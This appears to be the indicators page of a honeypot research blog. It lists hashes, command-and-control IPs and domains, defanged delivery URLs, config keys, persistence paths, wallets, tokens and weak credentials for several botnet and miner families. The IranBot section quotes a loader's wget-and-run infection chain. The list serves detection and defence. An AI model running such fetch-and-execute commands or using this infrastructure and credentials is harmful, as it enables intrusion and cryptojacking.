Diary of a Lost Honeypot
Indicators
Everything worth searching for: hashes, addresses, domains, keys and strings from every specimen that has landed in the honeypot, with the chapter that explains where each one comes from.
If you got here searching for a hash or an address, this is what there is. Every indicator comes from a published analysis, and the link on the right leads to the chapter that explains where it comes from and what it means — which is what a list, on its own, never tells you.
The URLs are defanged on purpose (hxxp://, [.]): they identify just the same and can’t be clicked by accident. IPs and domains are given as they are — that is what makes them indicators.
KHserver ch. 11 · ch. 12
| Type | Indicator | Context |
|---|---|---|
| sha256 | f7134ec664ca003c740337cf7b2fbba1162430d86ca1d7a2b5c14fe0463d261b | handshakebins.sh loader source → |
| sha256 | b297dc8f54f612f92c26735ab50e1360057df3909556d85e6439e695aa646148 | bot · Renesas SH (served as ARMV4L) source → |
| sha256 | 0658e79b91e732723b540ee7040eb0289c497f781d750e42b25dfcf10d233f50 | bot · ARM (served as MIPS) source → |
| sha256 | 5a21c34ff54ab1a92246b9cfba815ed187fe636b9350d41e26c5e4aa8f4bf891 | bot · ARM EABI4 (served as X86_64) source → |
| ip | 45.95.168.149:888 | command server · MAXKO d.o.o., AS211619 source → · my report ↗ |
| ip | 213.232.114.14 | payload server · VirMach/xTom, AS3214 source → |
| ip | 45.135.194.26 | attacking IP · Pfcloud UG, AS51396 source → |
| url | hxxp://213.232.114[.]14/handshakebins.sh | loader download source → |
| cadena | KHserverHACKER · KHcommSOCK | internal marks in the binary source → |
| cadena | echo PAYLOAD_EXECUTED | post-infection beacon source → |
| cadena | REPORT EXPLOIT %s %s:%d | C2 protocol source → |
| cadena | 4E/x31/x6B/x4B/x31/x20… | UDPBYPASS payload, inherited from SBIDIOT (2021) source → |
| cadena | khugepaged · kthreadd · kworker · systemd · dbus-daemon | process names it masquerades as source → |
| cadena | Aboriginal Linux | cross-toolchain it was built with source → |
Sysorbit ch. 7 · ch. 8
| Type | Indicator | Context |
|---|---|---|
| sha256 | 31de5c5d0a3483e831e4f9348d46b3c5309177a7f9d6da537fc970f57f103901 | sysorbit.apk source → |
| dominio | orbitcnc.twilightparadox.com | live C2 → 176.65.139.248:10293 source → · my report ↗ |
| dominio | updatemc.twilightparadox.com | live C2 → 176.65.139.248:10293 source → · my report ↗ |
| dominio | udpatetbl.duckdns.org · coxm.duckdns.org | fallback C2 (dormant) source → |
| ip | 176.65.139.248 | distribution and C2 · port 10293 source → · my report ↗ |
| token | ORBIT_BOT_AUTHVXJUACFHAVBA | C2 authentication token source → |
| cert | 01:B9:F7:13:02:D0:B1:39:3B:B3:EC:FA:B8:1E:9B:B9:6F:C6:58:33:0A:18:15:EE:C9:32:C0:D9:F2:E8:5C:E9 | certificate impersonating a Spanish company source → |
| cadena | com.sysorbit.service.security | Android package source → |
| cadena | sysorbit_watchdog · sysorbit_native_lock | abstract sockets source → |
RedTail ch. 5 · ch. 6
| Type | Indicator | Context |
|---|---|---|
| sha256 | f0aa83bbbd2c75e2f71ec16029ee5fcfad59f3a8efa30a500b815f0f6c18d987 | miner x86_64 source → |
| sha256 | d1cac82f44b54b0fd244a9e4122811e9ae108a197c7a65a20fd2e7552683e68e | miner aarch64 source → |
| sha256 | 3f3bf218089d1488617d37f8a5116bb2791eb39ce06a1b5bc9a4cdfe5e94dd39 | miner riscv source → |
| sha256 | 3f3a11bafabb1a35db913cfe51995f2e357d049e268860175876ae5a93d23892 | cleanup script source → |
| ip | 217.60.195.113 | delivery server · SFTP user dlr source → |
| ip | 103.46.186.105 | attacking IP source → |
| clave | ed25519 · comentario dlr@sftp | private key planted to fetch the payload source → |
| sha256 | 0db4656687a425c47d19000db866db52c7e415dbfaf6b5c651adcb9275ab23ca | the private key, exactly as written to disk source → |
| sha256 | ae8d459595257f2f22c9d1ff74c4fb8a91643fad7899b57556496716692b904e | the sshcfg shipped with it · StrictHostKeyChecking no source → |
| cadena | auth_ok · redtail_bot_telnet_ok | beacons source → |
| puerto | 2137/TCP | its mining pools' port source → |
| ruta | /var/build/redtail/scripts/x86_64-build/ | build path left inside the binary source → |
Mirai ch. 3 · ch. 4 · ch. 17
| Type | Indicator | Context |
|---|---|---|
| sha256 | bf0aabf517685756f16b22f4b1907113a1cd160fa7b5ee384cb554b42b311841 | bot x86-64 source → |
| sha256 | 8bdbe21eafc7223a75ea9d075237d389e0c39f6370721f1ea36214989e5bab63 | bot ARM source → |
| sha256 | 5c502903694591a219ca263247c4c159967c5838c9a85641f3fb908b983d1e32 | bot MIPS (BE) source → |
| sha256 | a75a98641037e42abb4c543d90e81dafdae3b27e90972b705a2e9242a5bee123 | bot MIPS (LE) source → |
| sha256 | 9d44d4d051f6aa3fbc95fab0aae818347a602d655fa7f1fba6267e728d7ff2d3 | bot PowerPC source → |
| sha256 | abda6887930f4e2e1047b39adf23bbf8bdee9e15c7e2101245bb690be7d80488 | bot SPARC source → |
| sha256 | 3366350561c41f5d15994244bfd7358ca256d16a1e954d7a986bd4d2d50c895e | bot Motorola m68k source → |
| sha256 | 41ac975aa0638b879bade9f672fbcdacb303bc6ceb5e92083b85af9cd440cd04 | bot Renesas SH source → |
| dominio | kappadocia.net | C2 → 141.98.10.50 source → |
| ip | 5.182.210.174 | delivery server (Go FileServer) source → |
| dominio | cc.nhancute.site | C2 · port 47925 → 160.250.181.124 (the same box that delivers) source → |
| ip | 160.250.181.124 | delivery and C2 · VPSRE, Vietnam, AS150895 source → |
| ip | 160.250.181.123 | attacking IP over ADB · sweeps, then loads source → |
| url | hxxp://160.250.181[.]124/k7m2q9xa/ | delivery directory (12 architectures) source → |
| url | hxxp://160.250.181[.]124/b4k9zp[.]sh | dropper (the other two: a7m2qx.sh, c8r3nv.sh) source → |
| sha256 | e60423da9b1484739cf0b7b883f2b74c9b9acab07e9db90c468960a691650fb1 | bot ARM · served as «arm» source → · my sample ↗ |
| sha256 | 873072018241d6efac32e47b8061d76f4b124ba6e6ab69609714f814b2a97f46 | bot ARM · served as «arm5» source → · my sample ↗ |
| sha256 | ee7c389272eed8a12562f29c985b93d2273ffff0cced791bd51e7ebe3ffe7ab0 | bot ARM EABI4 · served as «arm6» source → · my sample ↗ |
| sha256 | 239751754b0a33534fb3370d70a85cf409d346fb50fb96819756313958f7e4f2 | bot ARM EABI4 · served as «arm7» source → · my sample ↗ |
| sha256 | b08b41923efe6973da9c9782fd32df33bdd2b6f61ca421918b111bf9fc839098 | bot Motorola 68020 · served as «m68k» source → · my sample ↗ |
| sha256 | 904d5309b45a0691ec526de4daac7a039c717e933e0f4410e1eb6a9e82275764 | bot MIPS (BE) · served as «mips» source → · my sample ↗ |
| sha256 | 35574f2eb27f869415538a0e85531fa225416fc4e2b9e323d37bbcd519088b25 | bot MIPS (LE) · served as «mpsl» source → · my sample ↗ |
| sha256 | 0a8f44e98e4a87e20cf492dfab870d8067d31e4650a9200d55545eb13cfc48b5 | bot PowerPC · served as «ppc» source → · my sample ↗ |
| sha256 | 2f468807a88b41d0386960ed7cf48ea6a3bc1222ff1139cf8ca6194cec62737d | bot SPARC · served as «sh4» source → · my sample ↗ |
| sha256 | 07fe68558b309c5537d7f751a879cb64baa0960f28eb2e86c27076d7e219be4c | bot Renesas SH · served as «spc» source → · my sample ↗ |
| sha256 | 6502ee33f11f99c9e52e10d301275e61e85065643c3628387e7436ca9b0fc9e5 | bot Intel i386 · served as «x86» source → · my sample ↗ |
| sha256 | 1bf4366ad6b382991c6b8c68b4863e9bafcc8e9533867b0e17b1d5825689c143 | bot x86-64 · served as «x8664» source → · my sample ↗ |
| cadena | top1hbt | campaign marker (top1hbt.<arch>, what each bot re-serves) source → |
| cadena | /var/Condi · condi2 %s:%d · webserv | the family identifying itself source → |
| clave | table_key = 0x6d53d2c2 | XOR config · effective 1-byte key 0x2e (erases the domain dots) source → |
| cadena | 66 99 66 | bot↔C2 frame header + length (2 B) + payload (ping, condi2 webserv:<port>) source → |
| cadena | Server: Apache · User-Agent: Update v1.0 | each bot's fake httpd, on a random high port source → |
| ruta | /sbin · /usr/sbin · /bin · /usr/bin × reboot, shutdown, poweroff, halt | 16 paths unlinked from main (the public Condi covers 8) source → |
| ip | 45.198.224.26 | attacking IP (loader) source → |
| cadena | milnetv4 · marcador .anime | variant and family marker source → |
| clave | XOR de 1 byte · 0x54 | config encryption source → |
| cadena | /home/landley/aboriginal/… | fingerprint of the Aboriginal Linux cross-toolchain, the one that shipped with the 2016 Mirai source leak · visible in the one binary of the batch left un-stripped source → |
XorDDoS ch. 1 · ch. 2
| Type | Indicator | Context |
|---|---|---|
| sha256 | 6f45c6d9c70d97f695cb7bbef362812a17f8ed4d37dafc342c26c86ed9b43638 | bot source → |
| url | hxxp://169.239.130[.]20/new.php | distribution server (loader) source → |
| dominio | sys-kernel-update.to | live C2 → 141.98.11.51 · port 1529 source → |
| dominio | telemetry-pipe.sh · api-metadata-v6.is | fallback C2 (dormant) source → |
| ip | 141.98.11.51 | live C2 · HostBaltic, AS209605 (LT) — the IP rotates within the ASN: in June it was 141.98.10.115. What endures is the domain + ASN pair source → |
| clave | BB2FA36AAA9541F0 | 16-byte XOR key for the config source → |
| ruta | /etc/cron.hourly/gcc.sh · /var/run/gcc.pid | persistence source → |
| cadena | wget→good · curl→cool | renames the tools to blind rival botnets source → |
| ruta | /usr/lib/libudev.so | copies itself there on start-up · same SHA-256 as the sample source → |
| ruta | /usr/bin/<diez letras al azar> | copy under a random name · hash DIFFERENT from the sample (seen: nhwqrnmkhg, frxuyzisvv) source → |
| cadena | crond · /usr/sbin/gdm3 · rpc.statd · automount · rpc.idmapd · /sbin/audispd | daemons it impersonates by faking argv[0] · the name the kernel sees is still the real one source → |
Trinity ch. 13 · ch. 10
| Type | Indicator | Context |
|---|---|---|
| sha256 | 76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64 | spreader (trinity) · OLLVM-obfuscated source → |
| sha256 | a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437 | endat · self-extracting container (APK + script + miner) source → |
| sha256 | d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0 | xig · launcher (153 KB) source → |
| clave | 44XT4KvmobTQfeWa6PCQF5RDosr2MLWm43AsaE3o5iNRXXTfDbYk2VPHTVedTQHZyfXNzMn8YYF2466d3FSDT7gJS8gdHAr | operator's Monero wallet source → |
| ip | 139.99.9.133:5555 | active mining pool · OVH SAS, Singapore source → · my report ↗ |
| ip | 78.46.89.102:7777 | fallback pool · Hetzner, Germany source → · my report ↗ |
| ruta | /system/bin/debuggerd (original → debuggerd64_real) | persistence: hijacks Android's crash handler source → |
| cadena | com.google.time.timer · com.android.good.miner · com.google.test.test | rival miners it uninstalls source → |
| sha256 | 0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257 | APK source → |
| md5 | 8844985fcd57b0311d1d4cb2ec13a1ef | APK source → |
| cadena | com.ufo.miner · com.example.test.MainActivity | package and activity source → |
| clave | fwW95bBFO91OKUsz1VhlMEQwxmDBz7XE | Coinhive site key (the service shut down in 2019) source → |
| ruta | /data/local/tmp/ufo.apk | ADB install path source → |
VoIP ch. 9
| Type | Indicator | Context |
|---|---|---|
| ip | 172.110.223.49 | INVITE flood · UA pplsip · AS23470 ReliableSite (US) source → |
| ip | 94.26.31.62 | INVITE flood · UA VOIP · AS29802 Hivelocity (US) source → |
| ip | 23.111.166.26 | INVITE flood · spoofed Cisco-SIPGateway UA source → |
| ip | 158.51.78.101 | REGISTER brute force · Turkey source → |
| ip | 185.114.48.195 | REGISTER brute force · AS199792 ClearStack (NL) source → |
| cadena | pplsip · friendly-scanner · Cisco-SIPGateway (spoof) | malicious SIP user agents source → |
Cling ch. 18 · ch. 19 ⬇ YARA
| Type | Indicator | Context |
|---|---|---|
| sha256 | 1631e63ee373601c1f42f2674f996fc6c14dc6aebe45ca5d2395bf347a0e3661 | bot · aarch64 (hashes expire: the operator recompiles) source → |
| sha256 | 1b831a9366cd53a4127f885dab247bc2f0b3f661a7d9d9510bbd0a9f150bfb27 | bot · i686 source → |
| sha256 | 52bff4bf58eb6031c16763b12b696e849a38f36e69c55402a444819cb9c1bc0e | bot · i586 source → |
| ip | 85.11.167.132 | infected node that hit the honeypot over Telnet source → |
| url | hxxp://118.145.196[.]225:800/ | delivery server (wget.sh + one binary per architecture) source → |
| cadena | clingwashere | User-Agent when spreading over port 7547 (TR-064) source → |
| ruta | /root/.cling · /usr/local/bin/.cling · .cling en inittab/rcS/rc.boot | on-disk persistence source → |
| cadena | firma de red: STUN a 13 servidores casi a la vez · transaction ID a cero · baliza (etiqueta + 26 B) cada 5 s | what actually catches Cling: its behaviour, not the hash source → |
| cadena | firma del escáner: SYN salientes con puerto de origen fijo 9999 | a normal scan randomises the source port; this one pins it source → |
| cadena | 127.0.0.1:33957 en escucha | local single-instance lock source → |
| cadena | suplantación de init: /proc/<pid> que es bind mount de /tmp, idéntico a /proc/1 | ask what it is and the kernel answers "init" source → |
| cadena | órdenes UDP disfrazadas de STUN, sin autenticación (deducido) | the bot doesn't check who's commanding; not a reliable network signature source → |
| ip | 145.249.115.184 | the operator's mailbox (Aug-2026) · AS215540 · monoculture: 71/71 files talking to it are malware, 0 benign source → |
| ip | 94.154.43.158 | prior C2 (Jul-2026) · in a /24 that hops ASN; today AS219502 (Storm) source → |
| dominio | boymoder.ddns.net | 2025 C2 · dynamic DNS source → |
IranBot ch. 21 · ch. 22
| Type | Indicator | Context |
|---|---|---|
| ip | 176.65.139.206 | a single machine does everything: attacks, delivers (:80) and is the C2 (:2000) · AS219502, Storm Industries source → |
| ip | 176.65.139.206:2000 | cleartext C2, unencrypted and domainless (revealed in ch. 22) source → |
| url | hxxp://176.65.139[.]206/cat.sh | delivery server (cat.sh + iran.<arch> for 14 architectures) source → |
| credencial | telnet / telnet | credentials it logged into the honeypot with (root/icatch99 failed) source → |
| cadena | catloader | campaign tag in the loader's argv source → |
| cadena | Not a mirai at all · Death to israel · selfrep.realtek | family markers in the binary's strings source → |
| cadena | cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://<ip>/cat.sh; chmod cat.sh; sh cat.sh | the loader's infection chain (survives recompilations) source → |
| cadena | Mozilla/5.0 (Windows NT 10.0; Win64; x64) ... Chrome/58.0.3029.110 | fixed User-Agent of its httpmode= method source → |
| cve | CVE-2021-35394 | Realtek Jungle SDK (UDP 9034), one of its two propagation vectors source → |
| cadena | puertos fijos: 2000 (mando) · 9034/udp (Realtek) · 23 (escáner telnet) | hardcoded in the binary source → |
| ruta | /etc/init.d/xs.main · /etc/rc.local | persistence (documented by its VirusTotal record) source → |
| sha256 | 6a4503094d0031ae36c8b27cc36696087831901dfa421675ccb7509c9d7e58da | cat.sh loader (1,903 B) — hashes expire: it recompiles source → |
| sha256 | f35bf04216d14180f9d28f6770a5722557f4a979d746f4ef664419363d0b755b | bot · x86-64 source → |
| sha256 | 3f21d6f8621e38d2bc923dfaaf0861887c6ca0def522ae4dea0f9b840bf1d39a | bot · m68k source → |
| sha256 | 064d93495573a536517fa7ddf9fb6d3c4cddd4c7fdc61d4f90d12629cad690e6 | bot · MIPS source → |
| sha256 | ce452891a6e017f2523f8c7005df1180003ab3e96916774efb432bcc2a8e657f | bot · MIPSEL source → |
| sha256 | b1a6dba6636b519d76d7219f6264ac9f1456681c0855baef954fb435d3e25ce5 | x86-64 twin (164,272 B) used in the differential analysis · C2 103.83.87.122:8060 source → |
| dominio | femboys.chloebulldog.online:44510 · mythickass.onthewifi.com:313 · 103.83.87.122:8060 | the family's prior C2s (context) source → |
DIICOT ch. 23 · ch. 24 · ch. 25 · ch. 26 · ch. 27 · ch. 28
| Type | Indicator | Context |
|---|---|---|
| sha256 | a151d3f4f2422531f30a843ffb35479596c86722bb103bdf8591105687f9b125 | miner · the binary downloaded and run as .16 source → |
| ip | 92.118.39.77 | source IP · second visit source → |
| ip | 62.171.133.1 | source IP · third and fourth visit, the same repeat offender source → |
| url | hxxp://5.189.149[.]171/f/brute/m/.16_<arch> | delivery server · structured path campaign/type/architecture source → |
| cadena | function top() en ~/.bashrc que filtra la salida por sed borrando 16, libbase.sh y un número variable | shell backdoor · the top command lies source → |
| ruta | 16 · /dev/shm/.16 · /root/.16 | miner process and file name source → |
| ruta | system-helper · /etc/cron.d/cron_d_<n> · /etc/ld.so.preload · /root/.profile | persistence · five routes at once source → |
| clave | 89PNDJssF3RbL6m7aSydYB4tLrvjZ28Cr8n4LucmFHat8botWkWr6oDPEaSHfeZn4wfA3dC5QsE7nZV1P6tE81sK2i9heam | Monero wallet in use source → |
| ip | 169.58.248.162:443 | mining proxy · no TLS; extracted indicator, not an observed connection source → |
| ip | 5.189.149.171 | delivery server source → |
| dominio | project0.cc | delivery domain source → |
| dominio | pool-{fr,phx,nyc,hk,sg,aus,ca}.supportxmr.com:5555 | backup pools · all seven, in the clear source → |
| clave | XOR de un byte, clave 0x5A | config encryption · sweep all 256, it can differ between components source → |
| ruta | /usr/local/lib/libcommon.so | rootkit · hooks readdir source → |
| ruta | /var/tmp/snap · .X0-lock | payloads on disk source → |
| cadena | __TTY_GUARD_OK__ | self-check after writing the shell hook source → |
| clave | 87Fxj6UD… | previous wallet · collecting since 2021-01-14, stopped 2026-08-03 source → |
| cadena | 16 | worker name at the pool · the same one it camouflages itself with on the machine source → |
| ip | 109.160.32.115 | source of the intrusion · ASN 197170 TechTies source → |
| sha256 | 28e0c4d5bc6675537ba47c6529877a3194a29585fb86477f66bf13c79252d2f0 | dropper · Go + UPX, 16.6 MB, five modules inside source → |
| sha256 | 7d55a90710b8e79283efd756e8d3423fc23e0dcf742d6027b1a2a1b9d02a9c16 | the bot · P2P mesh and Telegram command source → |
| sha256 | 79a47c33335fe1ed871a23cf7972652ee08a3ec0afed1c2dc6b5a8df675e153d | XMRig, unconfigured source → |
| sha256 | ffe04bc05a56f78b1273876cf17ded8df1aa3da5a15deb17dce99a3e206eb705 | the loader · persistence and download engine source → |
| sha256 | c1c122869f46aaf8c4e90f3132c93a801c853244c756966952d0bf19241cf084 | second miner source → |
| ruta | /tmp/{cache,diicot,kuak} · /dev/shm/retea · /dev/shm/.x/{network,pass,bios.txt} | the five modules and their dictionary, on disk source → |
| cadena | /tmp/d.log con el contenido «admin» | marker that the machine is already theirs source → |
| credencial | root:Huawei@123 en el diccionario del escáner | gives away what boxes it targets besides servers source → |
| puerto | TCP 8081 | the mesh · listens and announces itself; target 2,000 connections source → |
| ip | 91.92.47.220:8081 | bootstrap neighbour hardcoded in the binary source → |
| ip | 31.57.105.94:42 | the attacker's own «what's my IP» service source → |
| token | 8778142498:AAE2YhxC6AB5PF8GOucHxCviYV4FA1JJnIE | Telegram bot identifier · already cancelled source → |
| cadena | User-Agent: skema | looks like no browser at all · a good network signature source → |
| cadena | 6059167279 | the operator's number · the only one authorised to give orders source → |
| cadena | DIICOT-BOTNET · v2-update-1 | its own status panel gives its name and version source → |
| cadena | peers.dat · semilla p2p-peers-salt-v1 | the mesh's peer file source → |
| cadena | myservices.service → /bin/bash /usr/bin/ssshd · RestartSec=1800 | systemd service with a system-sounding name source → |
| ruta | /usr/bin/ssshd | with three esses · it's the stager, not the SSH daemon source → |
| ruta | /var/tmp/<8 hex>/8b8989e8 | root cron every minute · the directory changes with every infection source → |
| cadena | ElPatrono1337 | comment on the SSH key it plants in /root/.ssh/authorized_keys source → |
| ruta | /tmp/.fontconfig/.fc-cache · /var/tmp/.ladyg0g0/.pr1nc35 · /var/tmp/Documents/.diicot | on-disk markers source → |
| sha256 | 2bcc91fdedb8c583a9fe883be9ad453333a1bba0fdf655474982db3cbb8e7a74 | the stager that pulls down the mining config source → |
| url | hxxp://195.24.237.240/.x/black3 | second stage · down as of 19 Sep 2026 source → |
| dominio | digital.digitaldatainsights[.]org | second-stage backup · down source → |
| cadena | ladyg0g0 · .pr1nc35 | other handles of the actor, in the paths it leaves source → |